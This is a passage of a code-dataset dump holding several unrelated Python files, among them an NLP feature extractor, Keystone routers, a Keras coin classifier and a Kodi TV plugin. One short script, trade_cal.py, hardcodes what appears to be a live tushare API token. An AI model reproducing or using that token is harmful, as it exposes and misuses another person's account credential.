'9/11':\r\n nine11 += 1\r\n\r\n if tag == 'nn' or tag == 'nns':\r\n c_nouns += 1\r\n if tag == 'nnp' or tag == 'nnps' or word in f_f_names or word in l_names or word in m_f_names:\r\n p_nouns += 1\r\n if tag == 'rb' or tag == 'rbr' or tag == 'rbs':\r\n adverbs += 1\r\n if tag == 'wdt' or tag == 'wp' or tag == 'wp$' or tag == 'wrb':\r\n wh += 1\r\n if word in slang_ac:\r\n slang += 1\r\n if len(word) >= 3 and word.isupper():\r\n upper += 1\r\n # average length of sentences\r\n if word not in string.punctuation:\r\n total_token_length += len(word)\r\n if word in string.punctuation:\r\n punc += 1\r\n if word in bg_norms:\r\n t_AoA += int(bg_norms[word][0]) #accumulate total norm values to get avg and make list of values\r\n t_IMG += int(bg_norms[word][1]) # to get std dev\r\n t_FAM += int(bg_norms[word][2])\r\n numb_bg += 1\r\n\r\n AoA_list.append(int(bg_norms[word][0]))\r\n IMG_list.append(int(bg_norms[word][1]))\r\n FAM_list.append(int(bg_norms[word][2]))\r\n if word in w_norms:\r\n t_vms += float(w_norms[word][0])\r\n t_ams += float(w_norms[word][1])\r\n t_dms += float(w_norms[word][2])\r\n num_w += 1\r\n\r\n vms_list.append(float(w_norms[word][0]))\r\n ams_list.append(float(w_norms[word][1]))\r\n dms_list.append(float(w_norms[word][2]))\r\n\r\n\r\n\r\n if len(comment.split()) != 0 and len(comment.split()) != punc:\r\n avg_token_len = (total_token_length) / (len(comment.split()) - punc)\r\n else:\r\n avg_token_len = 1\r\n if eos != 0:\r\n avg_sentence_len = len(comment.split()) / eos #make sure we dont get any divide by 0 errors\r\n else:\r\n eos = 1\r\n avg_sentence_len = len(comment.split())\r\n if numb_bg != 0:\r\n avg_AoA = t_AoA / numb_bg\r\n avg_IMG = t_IMG / numb_bg\r\n avg_FAM = t_FAM / numb_bg\r\n sd_AoA = np.std(AoA_list)\r\n sd_IMG = np.std(IMG_list)\r\n sd_FAM = np.std(FAM_list)\r\n else:\r\n avg_AoA = 0\r\n avg_IMG = 0\r\n avg_FAM = 0\r\n sd_AoA = 0\r\n sd_IMG = 0\r\n sd_FAM = 0\r\n if num_w != 0:\r\n avg_vms = t_vms / num_w\r\n avg_ams = t_ams / num_w\r\n avg_dms = t_dms / num_w\r\n sd_vms = np.std(vms_list)\r\n sd_ams = np.std(ams_list)\r\n sd_dms = np.std(dms_list)\r\n else:\r\n avg_vms = 0\r\n avg_ams = 0\r\n avg_dms = 0\r\n sd_vms = 0\r\n sd_ams = 0\r\n sd_dms = 0\r\n\r\n #create feature array\r\n feats[0], feats[1], feats[2], feats[3], feats[4], feats[5] = first_pp, second_pp, third_pp, cc, past_vb, fut_vb\r\n feats[6], feats[7], feats[8], feats[9], feats[10], feats[11] = commas, multipunc, c_nouns, p_nouns, adverbs, wh\r\n feats[12], feats[13], feats[14], feats[15], feats[16], feats[17] = slang, upper, avg_sentence_len, avg_token_len, eos, avg_AoA\r\n feats[18], feats[19], feats[20], feats[21], feats[22], feats[23] = avg_IMG, avg_FAM, sd_AoA, sd_IMG, sd_FAM, avg_vms\r\n feats[24], feats[25], feats[26], feats[27], feats[28], feats[29] = avg_ams, avg_dms, sd_vms, sd_ams, sd_dms, nine11\r\n return feats\r\n\r\n\r\n\r\n\r\ndef main( args ):\r\n\r\n data = json.load(open(args.input))\r\n feats = np.zeros( (len(data), 174+1))\r\n\r\n alt_features = np.load(\"Alt_feats.dat.npy\") #load features\r\n cen_features = np.load(\"Center_feats.dat.npy\")\r\n lef_features = np.load(\"Left_feats.dat.npy\")\r\n ri_features = np.load(\"Right_feats.dat.npy\")\r\n\r\n j = 0\r\n for field in data:\r\n feat = extract1(field[\"body\"].lower())\r\n id = field['id']\r\n cat = field['cat']\r\n i = 0\r\n with open(cat + \"_IDs.txt\") as ids: #find index of id\r\n line = ids.readlines()\r\n i = line.index(id + '\\r\\n')\r\n\r\n\r\n if cat == \"Left\": #append relevant features and then category to feature array\r\n feat = np.append(feat, lef_features[i], axis=None)\r\n feat = np.append(feat, [0])\r\n elif cat == \"Center\":\r\n feat = np.append(feat, cen_features[i], axis=None)\r\n feat = np.append(feat, [1])\r\n elif cat == \"Right\":\r\n feat = np.append(feat, ri_features[i], axis=None)\r\n feat = np.append(feat, [2])\r\n elif cat == \"Alt\":\r\n feat = np.append(feat, alt_features[i], axis=None)\r\n feat = np.append(feat, [3])\r\n feats[j] = feat\r\n j += 1\r\n\r\n\r\n\r\n\r\n np.savez_compressed( args.output, feats)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n\r\n parser = argparse.ArgumentParser(description='Process each .')\r\n parser.add_argument(\"-o\", \"--output\", help=\"Directs the output to a filename of your choice\", required=True)\r\n parser.add_argument(\"-i\", \"--input\", help=\"The input JSON file, preprocessed as in Task 1\", required=True)\r\n args = parser.parse_args()\r\n\r\n\r\n main(args)\r\n\r\n","sub_path":"Text classifier/a1_extractFeaturesBonus.py","file_name":"a1_extractFeaturesBonus.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"442164369","text":"#!/usr/bin/ python3\n# -*- coding:utf-8 -*-\n'''\n Author:zyf\n 功能:利用tushare库下载可交易日,并保存为csv文件。\n'''\nimport tushare as ts\nstart = '20190101'\nend = '20191231'\n\nts.set_token('89b4c72135b4dd4deb39b689a2c640aacf09fe44be16e51f341693ce')\npro = ts.pro_api()\n\ndf = pro.trade_cal(exchange='',start_date=start,end_date=end)\n#print(df)\ndf.to_csv('./trade_cal.csv')\n\n#print(df.cal_date[0])\n\n","sub_path":"trade_cal.py","file_name":"trade_cal.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"22085284","text":"# Copyright 2018 SUSE Linux GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"WSGI Routers for the Application Credential service.\"\"\"\n\nfrom keystone.application_credential import controllers\nfrom keystone.common import json_home\nfrom keystone.common import wsgi\n\nAPP_CRED_RESOURCE_RELATION = json_home.build_v3_resource_relation(\n 'application_credential')\nAPP_CRED_PARAMETER_RELATION = json_home.build_v3_parameter_relation(\n 'application_credential_id')\nAPP_CRED_COLLECTION_PATH = '/users/{user_id}/application_credentials'\nAPP_CRED_RESOURCE_PATH = (\n '/users/{user_id}/application_credentials/{application_credential_id}'\n)\n\n\nclass Routers(wsgi.RoutersBase):\n _path_prefixes = (APP_CRED_COLLECTION_PATH, 'users',)\n\n def append_v3_routers(self, mapper, routers):\n app_cred_controller = controllers.ApplicationCredentialV3()\n\n self._add_resource(\n mapper, app_cred_controller,\n path=APP_CRED_COLLECTION_PATH,\n get_head_action='list_application_credentials',\n post_action='create_application_credential',\n rel=APP_CRED_RESOURCE_RELATION,\n path_vars={\n 'user_id': json_home.Parameters.USER_ID,\n })\n\n self._add_resource(\n mapper, app_cred_controller,\n path=APP_CRED_RESOURCE_PATH,\n get_head_action='get_application_credential',\n delete_action='delete_application_credential',\n rel=APP_CRED_RESOURCE_RELATION,\n path_vars={\n 'user_id': json_home.Parameters.USER_ID,\n 'application_credential_id': APP_CRED_PARAMETER_RELATION,\n })\n","sub_path":"keystone/application_credential/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"508019879","text":"# FCA 프로그램 제작 프로젝트 \r\n# InputContext_without_Pandas : Formal Context를 입력처리하는 함수(또는 모듈)\r\n# 2018210032 김태영\r\n# 2021.05.08.\r\nimport csv\r\n\r\ndef InputContext(fileName):\r\n \"\"\"\r\n Input : MS Excel파일(csv형식. K := (G,M,I)내용)\r\n Output : N/A\r\n \"\"\"\r\n f = open(fileName,'r', encoding='utf-8')\r\n data = list(csv.reader(f))\r\n \r\n G = [i[0] for i in data[1:]]\r\n M = data[0]\r\n GXM = [i[1:] for i in data[1:]]\r\n I = []\r\n \r\n # Process : Formal Context를 읽어들여서 \"적절한 Data구조 K\"에 저장\"\r\n # G : 객체들의 집합, M : 속성들의 집합, I : 객체와 속성 사이의 관계 집합 (I ⊆ G × M), formal context K:=(G, M, I)\r\n for g in range(len(GXM)):\r\n for m in range(len(GXM[g])):\r\n if GXM[g][m] in ['x', 'X']:\r\n I.append((G[g], M[m]))\r\n \r\n K = [set(G),set(M),set(I)]\r\n return(K)\r\n f.close()\r\n \r\n\r\n# example\r\ncsv_FileName = \"./TestData.csv\"\r\nresult = InputContext(csv_FileName)\r\nprint(result) ","sub_path":"InputContext_without_Pandas_kty.py","file_name":"InputContext_without_Pandas_kty.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"290546250","text":"# 简单输出斐波那契數列前 N 个数\n# 但有经验的开发者会指出,直接在 fab 函数中用 print 打印数字会导致该函数可复用性较差,因为 fab 函数返回 None,其他函数无法获得该函数生成的数列。\ndef fab(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n\n\nfab(5)\n\n\n# 改写后的 fab 函数通过返回 List 能满足复用性的要求,但是更有经验的开发者会指出,该函数在运行中占用的内存会随着参数 max 的增大而增大,如果要��制内存占用,最好不要用 List\n# 来保存中间结果,而是通过 iterable 对象来迭代\ndef fab2(max):\n n, a, b = 0, 0, 1\n L = []\n while n < max:\n L.append(b)\n a, b = b, a + b\n n = n + 1\n return L\n\n\nfor n in fab2(5):\n print(n)\n\n# 清单 3. 通过 iterable 对象来迭代\nfor i in range(1000): pass\n\n\n# 不会生成一个 1000 个元素的 List,而是在每次迭代中返回下一个数值,内存空间占用很小。因为 xrange 不返回 List,而是返回一个 iterable 对象\n# for i in xrange(1000): pass\n\n# Fab 类通过 next() 不断返回数列的下一个数,内存占用始终为常数:\nclass Fab(object):\n def __init__(self, max):\n self.max = max\n self.n, self.a, self.b = 0, 0, 1\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.n < self.max:\n r = self.b\n self.a, self.b = self.b, self.a + self.b\n self.n = self.n + 1\n return r\n raise StopIteration()\nfor n in Fab(5):\n print (n)","sub_path":"base/yieldDemo2.py","file_name":"yieldDemo2.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"336438449","text":"#!/usr/bin/env python3\n\n# This script is modified from https://github.com/SaschaWillems/Vulkan/blob/master/download_assets.py\n\nimport sys\nimport os\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\nASSET_GENERAL_TEXTURE_URL = \"https://vulkan-tutorial.com/images/texture.jpg\"\nASSET_CHALET_TEXTURE_URL = \"https://vulkan-tutorial.com/resources/chalet.jpg\"\nASSET_CHALET_OBJ_URL = \"https://vulkan-tutorial.com/resources/chalet.obj.zip\"\n\nASSET_GENERAL_TEXTURE_PATH = \"./assets/texture.jpg\"\nASSET_CHALET_TEXTURE_PATH = \"./assets/chalet.jpg\"\nASSET_CHALET_OBJ_ZIP_PATH = \"./assets/chalet.obj.zip\"\n\ndef reporthook(blocknum, blocksize, totalsize):\n bytesread = blocknum * blocksize\n if totalsize > 0:\n percent = bytesread * 1e2 / totalsize\n s = \"\\r%5.1f%% (%*d / %d bytes)\" % (percent, len(str(totalsize)), bytesread, totalsize)\n sys.stderr.write(s)\n if bytesread >= totalsize:\n sys.stderr.write(\"\\n\")\n else:\n sys.stderr.write(\"read %d\\n\" % (bytesread,))\n\nprint(\"Downloading CC0 licensed image...\")\nurlretrieve(ASSET_GENERAL_TEXTURE_URL, ASSET_GENERAL_TEXTURE_PATH, reporthook)\n\nprint(\"Downloading chalet texture...\")\nurlretrieve(ASSET_CHALET_TEXTURE_URL, ASSET_CHALET_TEXTURE_PATH, reporthook)\n\nprint(\"Downloading chalet obj...\")\nurlretrieve(ASSET_CHALET_OBJ_URL, ASSET_CHALET_OBJ_ZIP_PATH, reporthook)\n\nprint(\"Download finished\")\n\nprint(\"Extracting chalet obj...\")\n\nzip = ZipFile(ASSET_CHALET_OBJ_ZIP_PATH, 'r')\nzip.extractall(\"./assets/\")\nzip.close()\nos.remove(ASSET_CHALET_OBJ_ZIP_PATH)\n\nprint('..done!')\n","sub_path":"download_asset.py","file_name":"download_asset.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"217277152","text":"def get_duplication(list, length):\n assert length != 0, \"The list is empty\"\n tempt = [None for i in range(length)]\n for j in range(0, length):\n assert 1 <= list[j] < length, \"The number %d in list is illegal\" % list[j]\n if tempt[list[j]] is None:\n tempt[list[j]] = list[j]\n else:\n return list[j]\n return False\n\n\n\n","sub_path":"getDuplications_O(n).py","file_name":"getDuplications_O(n).py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"224469298","text":"import logging\nfrom os.path import exists\n\nimport sh\n\nfrom changes import attributes, config\n\nlog = logging.getLogger(__name__)\n\nREQUIREMENTS = 'requirements.txt'\n\n\ndef get_requirements():\n requirements_file = config.arguments.get('--requirements') or REQUIREMENTS\n has_requirements = exists(requirements_file)\n requirements = None\n if has_requirements:\n requirements = open(requirements_file).readlines()\n\n return requirements_file, requirements\n\n\ndef has_requirement(dependency):\n _, requirements = get_requirements()\n return any(\n [dependency in requirement for requirement in requirements]\n )\n\n\ndef probe_project(module_name):\n \"\"\"\n Check if the project meets `changes` requirements\n \"\"\"\n log.info('Checking project for changes requirements.')\n # on [github](https://github.com)\n git_remotes = sh.git.remote('-v')\n on_github = any(['github.com' in remote for remote in git_remotes])\n log.info('On Github? %s', on_github)\n\n # `setup.py`\n setup = exists('setup.py')\n log.info('setup.py? %s', setup)\n\n # `requirements.txt`\n requirements_file, requirements = get_requirements()\n has_requirements = exists(requirements_file)\n\n if has_requirements:\n # supports executing tests with `nosetests` or `tox`\n runs_tests = (\n has_requirement('nose') or has_requirement('tox')\n )\n log.info('Runs tests? %s' % runs_tests)\n\n # `CHANGELOG.md`\n has_changelog = exists('CHANGELOG.md')\n log.info('CHANGELOG.md? %s', has_changelog)\n\n # `/__init__.py` with `__version__` and `__url__`\n init_path = '%s/__init__.py' % module_name\n has_metadata = (\n exists(init_path) and\n attributes.has_attribute(module_name, '__version__') and\n attributes.has_attribute(module_name, '__url__')\n )\n log.info('Has module metadata? %s', has_metadata)\n\n return (on_github and setup and has_changelog and has_metadata and\n has_requirements and runs_tests)\n","sub_path":"changes/probe.py","file_name":"probe.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"168342805","text":"#######################################################################\n\n# Coin Detector and Recognizer - Exam of Computer Vision 2018/2019 UNIPD\n\n# @author Leonardo Sartori (leonardo.sartori.1@studenti.unipp.it)\n# @version 1.0\n\n#######################################################################\n\nimport datetime\nimport os\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense, GlobalAveragePooling2D\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.optimizers import SGD, rmsprop\n\nfrom keras.models import Model\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input\n\nINPUT_SIZE = 224\nBATCH_SIZE = 32\nUSE_VAL = True\n\nTRAIN_PATH = 'images/coins-dataset/classified/train'\nVAL_PATH = 'images/coins-dataset/classified/test'\n\n# SMALL DEBUG TRAINSET\n# TRAIN_PATH = '/home/leonardo/Documents/computer_vision/project/images/small_train'\n\n\n# HERE THERE IS A SERIES OF MODEL TESTED, BEST IS cifar (keras.io/examples/cifar10_cnn/)\n# BUT ANYWAY FAR FROM TRANSFER LEARNING RESULTS\n\ndef create_model(l_num):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), input_shape=(INPUT_SIZE, INPUT_SIZE,3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(32, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors\n model.add(Dense(64))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(l_num))\n model.add(Activation('softmax'))\n\n return model\n\ndef create_model_doc(l_num):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(3, INPUT_SIZE, INPUT_SIZE)))\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(l_num, activation='softmax'))\n return model\n\ndef create_model_cifar(l_num):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), padding='same', input_shape=(3, INPUT_SIZE, INPUT_SIZE)))\n model.add(Activation('relu'))\n model.add(Conv2D(32, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64, (3, 3), padding='same'))\n model.add(Activation('relu'))\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(l_num))\n model.add(Activation('softmax'))\n return model\n\ndef create_model_zi(l_num):\n\n model = Sequential()\n\n model.add(Conv2D(64, (5, 5), padding='same', input_shape=(3, INPUT_SIZE, INPUT_SIZE)))\n model.add(Activation('relu'))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(128, (5, 5), padding='same'))\n model.add(Activation('relu'))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3), padding='same'))\n model.add(Activation('relu'))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(512, (3, 3), padding='same'))\n model.add(Activation('relu'))\n\n model.add(Flatten())\n model.add(Dense(1024))\n model.add(Activation('relu'))\n\n model.add(Dense(l_num))\n model.add(Activation('softmax'))\n\n return model\n\nif __name__ == '__main__':\n\n labels_num = sum(os.path.isdir(os.path.join(TRAIN_PATH,i)) for i in os.listdir(TRAIN_PATH))\n print (\"labels_num: \" + str(labels_num))\n\n # alternative to rms\n #sgd = SGD(lr=0.0001, decay=1e-6, momentum=0.9, nesterov=True)\n rms = rmsprop(lr=0.0001, decay=1e-6)\n\n # ------------------ TRANSFER LEARNING ------------------\n\n # BEST MODEL TESTED IS InceptionV3, very complex and big but we don't have time constraints so I'll use it\n base_model=InceptionV3(weights='imagenet',include_top=False) #imports the Inception model and discards the last 1000 neuron layer.\n\n x=base_model.output\n\n #we add dense layers so that the model can learn more complex functions and classify for better results.\n x=GlobalAveragePooling2D()(x)\n x=Dense(1024,activation='relu')(x)\n # x=Dense(1024,activation='relu')(x) # dense layer 2, removal speeds uo train and does not affect performance significantly\n x=Dense(512,activation='relu')(x) #dense layer 3\n preds=Dense(labels_num,activation='softmax')(x) #final layer with softmax activation\n\n #specify the inputs\n #specify the outputs\n model=Model(inputs=base_model.input,outputs=preds)\n #now a model has been created based on selected architecture\n\n # freeze layers already trained\n for layer in model.layers[:20]:\n layer.trainable=False\n for layer in model.layers[20:]:\n layer.trainable=True\n\n # now use the model as usual\n\n model.compile(loss='categorical_crossentropy',\n optimizer=rms,\n metrics=['accuracy'])\n\n # alternative and custom preprocessing and data augmentation\n #train_datagen = ImageDataGenerator(\n # rescale=1./255,\n # zoom_range=0.2,\n # rotation_range=20,\n # horizontal_flip=True,\n # vertical_flip=True\n #)\n\n # use pretrained network preprocessing\n train_datagen=ImageDataGenerator(preprocessing_function=preprocess_input) #included in our dependencies\n\n # this is a generator that will read pictures found in\n # subfolders of path, and indefinitely generate\n # batches of augmented image data\n train_generator = train_datagen.flow_from_directory(\n TRAIN_PATH, # this is the target directory\n target_size=(INPUT_SIZE, INPUT_SIZE), # all images will be resized to 150x150\n batch_size=BATCH_SIZE,\n class_mode='categorical'\n )\n # train_generator is DirectoryIterator yielding tuples of (x, y) where x is a\n # numpy array containing a batch of images with shape\n # (batch_size, *target_size, channels) and y is a numpy array of corresponding labels\n\n # Check on loaded files\n # sample_batch = next(train_generator)\n # print('Train img shape: ' + str(sample_batch[0].shape))\n\n # Setup the rest of parameters for training\n if USE_VAL:\n # for test, only rescaling\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n # similar generator, for validation data\n validation_generator = test_datagen.flow_from_directory(\n VAL_PATH,\n target_size=(INPUT_SIZE, INPUT_SIZE),\n batch_size=BATCH_SIZE,\n class_mode='categorical')\n\n # TRAIN\n step_size_train=train_generator.n//train_generator.batch_size\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=step_size_train,\n epochs=30,\n validation_data=validation_generator,\n validation_steps=50 // BATCH_SIZE)\n else:\n # TRAIN WITHOUT VALIDATION (ONLY FOR DEBUG)\n model.fit_generator(\n train_generator,\n steps_per_epoch=1000 // BATCH_SIZE,\n epochs=30,\n validation_data=None,\n validation_steps=50 // BATCH_SIZE)\n\n # creation of unique model name\n model_filename = 'model' + str(datetime.datetime.now().isoformat())\n\n # serialize model to JSON\n model_json = model.to_json()\n with open(model_filename + '.json', \"w\") as json_file:\n json_file.write(model_json)\n\n # serialize weights to HDF5\n model.save_weights(model_filename + '.h5')\n\n print(\"Saved model to disk as \" + model_filename)\n","sub_path":"transfer_azure.py","file_name":"transfer_azure.py","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"319575175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 13 15:05:55 2019\n\n@author: adutz\n\"\"\"\n\nimport numpy as np\nimport py_mentat as pm\n\nclass Node:\n \n def __init__(self,coordinates,*args,**kwargs):\n \n self.coordinates = np.array(coordinates)\n \n self.options = {}\n for key,value in kwargs.items():\n self.options[key] = value\n\n self.mentat_id = None\n\n def tomentat(self):\n x,y,z = self.coordinates\n pm.py_send(\"*add_nodes %f %f %f\" % (x,y,z))\n \n mentat_id = pm.py_get_int('max_node_id()')\n \n try:\n node_set = self.options['membership']\n end = ' #'\n\n mentat_command = ' '.join(['*store_nodes', \n node_set, str(mentat_id), end])\n pm.py_send(mentat_command)\n except:\n pass\n \n self.mentat_id = mentat_id","sub_path":"prepostpy/core/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"572206386","text":"import os\nimport copy\n\nfrom xbmcswift2 import xbmc, xbmcvfs\n\nfrom meta import plugin, import_tmdb, import_tvdb, LANG\nfrom meta.gui import dialogs\nfrom meta.info import get_tvshow_metadata_tvdb, get_season_metadata_tvdb, get_episode_metadata_tvdb\nfrom meta.utils.text import parse_year, is_ascii\nfrom meta.utils.executor import execute\nfrom meta.utils.properties import set_property\nfrom meta.library.tvshows import setup_library, add_tvshow_to_library\nfrom meta.library.tools import scan_library\nfrom meta.play.base import active_players\nfrom meta.play.tvshows import play_episode\nfrom meta.play.players import ADDON_DEFAULT, ADDON_SELECTOR\nfrom meta.navigation.base import search, get_icon_path, get_genre_icon, get_genres, get_tv_genres, caller_name, caller_args\nfrom language import get_string as _\nfrom settings import CACHE_TTL, SETTING_TV_LIBRARY_FOLDER\n\n\n@plugin.route('/tv')\ndef tv():\n \"\"\" TV directory \"\"\"\n items = [\n {\n 'label': _(\"Search\"),\n 'path': plugin.url_for(tv_search),\n 'icon': get_icon_path(\"search\"),\n },\n {\n 'label': _(\"Genres\"),\n 'path': plugin.url_for(tv_genres),\n 'icon': get_icon_path(\"genres\"),\n },\n {\n 'label': _(\"Popular\"),\n 'path': plugin.url_for(tv_most_popular, page='1'),\n 'icon': get_icon_path(\"popular\"),\n },\n {\n 'label': _(\"On the air\"),\n 'path': plugin.url_for(tv_now_playing, page='1'),\n 'icon': get_icon_path(\"tv\"),\n },\n {\n 'label': _(\"Top rated\"),\n 'path': plugin.url_for(tv_top_rated, page='1'),\n 'icon': get_icon_path(\"top_rated\"),\n },\n ]\n \n fanart = plugin.addon.getAddonInfo('fanart')\n for item in items:\n item['properties'] = {'fanart_image' : fanart}\n\n return items\n\n@plugin.route('/tv/search')\ndef tv_search():\n \"\"\" Activate movie search \"\"\"\n search(tv_search_term)\n\n@plugin.route('/tv/search_term//')\ndef tv_search_term(term, page):\n \"\"\" Perform search of a specified \"\"\"\n# import_tmdb()\n# result = tmdb.Search().tv(query=term, language=LANG, page=page)\n# return list_tvshows(result)\n\n import_tvdb()\n \n search_results = tvdb.search(term, language=LANG)\n\n items = []\n load_full_tvshow = lambda tvshow : tvdb.get_show(tvshow['id'], full=True)\n for tvdb_show in execute(load_full_tvshow, search_results, workers=10):\n items.append(make_tvshow_item(tvdb_show))\n \n return items\n\n@plugin.cached_route('/tv/most_popular/', TTL=CACHE_TTL)\ndef tv_most_popular(page):\n \"\"\" Most popular shows \"\"\"\n import_tmdb()\n result = tmdb.TV().popular(page=page, language=LANG)\n return list_tvshows(result)\n \n@plugin.cached_route('/tv/now_playing/', TTL=CACHE_TTL)\ndef tv_now_playing(page):\n \"\"\" On the air shows \"\"\"\n import_tmdb()\n result = tmdb.TV().on_the_air(page=page, language=LANG)\n return list_tvshows(result)\n\n@plugin.cached_route('/tv/top_rated/', TTL=CACHE_TTL)\ndef tv_top_rated(page):\n \"\"\" Top rated shows \"\"\"\n import_tmdb()\n result = tmdb.TV().top_rated(page=page, language=LANG)\n return list_tvshows(result)\n\n@plugin.cached_route('/tv/genre//', TTL=CACHE_TTL)\ndef tv_genre(id, page):\n \"\"\" Shows by genre \"\"\"\n import_tmdb()\n result = tmdb.Discover().tv(with_genres=id, page=page, language=LANG)\n return list_tvshows(result)\n\n@plugin.cached_route('/tv/genres', cache=\"genres\")\ndef tv_genres():\n \"\"\" TV genres list \"\"\"\n genres = get_tv_genres()\n return sorted([{ 'label': name,\n 'icon': get_genre_icon(id),\n 'path': plugin.url_for(tv_genre, id=id, page='1') } \n for id, name in genres.items()], key=lambda k: k['label'])\n\n@plugin.route('/tv/tvdb/')\ndef tv_tvshow(id):\n \"\"\" All seasons of a TV show \"\"\"\n plugin.set_content('seasons')\n return list_seasons_tvdb(id)\n\n@plugin.route('/tv/tvdb//')\ndef tv_season(id, season_num):\n \"\"\" All episodes of a TV season \"\"\"\n plugin.set_content('episodes')\n return list_episodes_tvdb(id, season_num)\n\n@plugin.route('/tv/set_library_player/')\ndef set_library_player(path):\n # get active players\n players = active_players(\"tvshows\")\n players.insert(0, ADDON_SELECTOR)\n players.insert(0, ADDON_DEFAULT)\n # let the user select one player\n selection = dialogs.select(_(\"Select default player\"), [p.title for p in players])\n if selection == -1:\n return\n # get selected player\n player = players[selection]\n \n # Create play with file\n player_filepath = os.path.join(path, 'player.info')\n player_file = xbmcvfs.File(player_filepath, 'w')\n content = \"{0}\".format(player.id)\n player_file.write(content)\n player_file.close()\n \n@plugin.route('/tv/add_to_library/')\ndef tv_add_to_library(id):\n import_tvdb() \n show = tvdb[int(id)]\n \n # get active players\n players = active_players(\"tvshows\", filters = {'network': show.get('network')})\n \n # add default and selector options\n players.insert(0, ADDON_SELECTOR)\n players.insert(0, ADDON_DEFAULT)\n \n # let the user select one player\n selection = dialogs.select(_(\"Play with...\"), [p.title for p in players])\n if selection == -1:\n return\n \n # get selected player\n player = players[selection]\n \n # setup library folder\n library_folder = setup_library(plugin.get_setting(SETTING_TV_LIBRARY_FOLDER))\n\n # add to library\n if add_tvshow_to_library(library_folder, show, player.id):\n set_property(\"clean_library\", 1)\n \n # start scan \n scan_library()\n \n@plugin.route('/tv/play////')\ndef tv_play(id, season, episode, mode): \n play_episode(id, season, episode, mode)\n \ndef list_tvshows(response):\n \"\"\" TV shows listing \"\"\"\n import_tvdb()\n \n # Attach TVDB data to TMDB results\n items = []\n results = response['results']\n for tvdb_show, tmdb_show in execute(tmdb_to_tvdb, results, workers=10):\n if tvdb_show is not None:\n items.append(make_tvshow_item(tvdb_show, tmdb_show))\n \n if xbmc.abortRequested:\n return\n\n # Paging\n if 'page' in response:\n page = response['page']\n args = caller_args()\n if page < response['total_pages']:\n args['page'] = str(page + 1)\n items.append({\n 'label': _(\"Next >>\"),\n 'icon': get_icon_path(\"item_next\"),\n 'path': plugin.url_for(caller_name(), **args)\n })\n \n return items\n\ndef make_tvshow_item(tvdb_show, tmdb_show=None):\n tvdb_info = 